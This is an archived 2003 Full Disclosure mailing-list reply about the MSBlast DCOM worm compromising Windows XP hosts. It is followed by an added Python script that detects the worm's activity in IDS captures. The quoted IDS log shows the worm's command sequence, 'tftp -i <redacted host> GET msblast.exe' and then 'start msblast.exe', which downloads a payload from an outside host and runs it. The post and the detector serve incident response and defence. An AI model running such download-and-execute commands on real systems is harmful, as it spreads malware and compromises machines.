Full Disclosure mailing list archives

Re: DCOM Worm?


From: Jordan Wiens <jwiens () nersp nerdc ufl edu>
Date: Mon, 11 Aug 2003 19:29:05 -0400 (EDT)

On Mon, 11 Aug 2003, Carl Sager wrote:

> Aha!  The worm is using the 2k offsets and corrupts
> the DCOM RPC service on XP, which makes the OS
> automatically shut down after 1 minute.  Patch up or
> use a firewall (or well, just tell any ignorant end
> users to do so) and you'll be good!

You sure about that?  I'm seeing it compromise XP hosts as well.  Maybe it
randomly switches between offsets?

In fact, IDS logs from our first compromised host:

Microsoft Windows XP [Version 5.1.2600]Microsoft Windows XP [Version
5.1.2600]tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
start msblast.exe{A}
start msblast.exe{A}
msblast.exe{A}
msblast.exe{A}



-- 
Jordan Wiens, CISSP
UF Network Incident Response Team
(352)392-2061
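An added example, not part of the thread: a small detector for the pattern visible in the capture above, the `tftp -i <server> GET <file>` download followed by execution of that file. The sample capture is constructed to mirror the quoted one, and it assumes the sensor renders LF and CR as `{A}` and `{D}`; `aaa.bbb.ccc.ddd` is the redacted server address as quoted.

```python
import re

# Constructed sample modelled on the IDS capture quoted above. Assumption:
# the sensor writes LF as {A} and CR as {D}; aaa.bbb.ccc.ddd is the redacted
# TFTP server address exactly as it appears in the quoted log.
SAMPLE_CAPTURE = """Microsoft Windows XP [Version 5.1.2600]Microsoft Windows XP [Version
5.1.2600]tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
C:\\WINDOWS\\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
start msblast.exe{A}
msblast.exe{A}
"""

# Binary-mode TFTP fetch: "tftp -i <server> GET <file>"
TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)", re.IGNORECASE)
# Execution of an .exe, either "start <file>.exe" or the bare file name,
# optionally preceded by a "C:\...>" prompt.
START_RE = re.compile(r"(?:^|>)\s*(?:start\s+)?(\S+\.exe)\s*$", re.IGNORECASE)

def normalise(capture):
    """Turn the sensor's {A}/{D} markers back into line breaks and drop blanks."""
    text = capture.replace("{D}", "").replace("{A}", "\n")
    return [ln.strip() for ln in text.splitlines() if ln.strip()]

def detect_tftp_dropper(capture):
    """Return (server, filename, executed) for every TFTP download seen.

    'executed' is True when a later line runs the downloaded file, which is
    the download-then-run sequence shown in the quoted capture.
    """
    downloads = {}
    for line in normalise(capture):
        m = TFTP_RE.search(line)
        if m:
            server, fname = m.group(1), m.group(2).lower()
            downloads.setdefault(fname, {"server": server, "executed": False})
            continue
        m = START_RE.search(line)
        if m and m.group(1).lower() in downloads:
            downloads[m.group(1).lower()]["executed"] = True
    return [(v["server"], f, v["executed"]) for f, v in downloads.items()]

if __name__ == "__main__":
    for server, fname, executed in detect_tftp_dropper(SAMPLE_CAPTURE):
        print(f"TFTP fetch of {fname} from {server}; executed={executed}")
```

A download that is never followed by execution is still reported, with `executed` set to False, so the check also flags a fetch that failed before the file was run.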


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

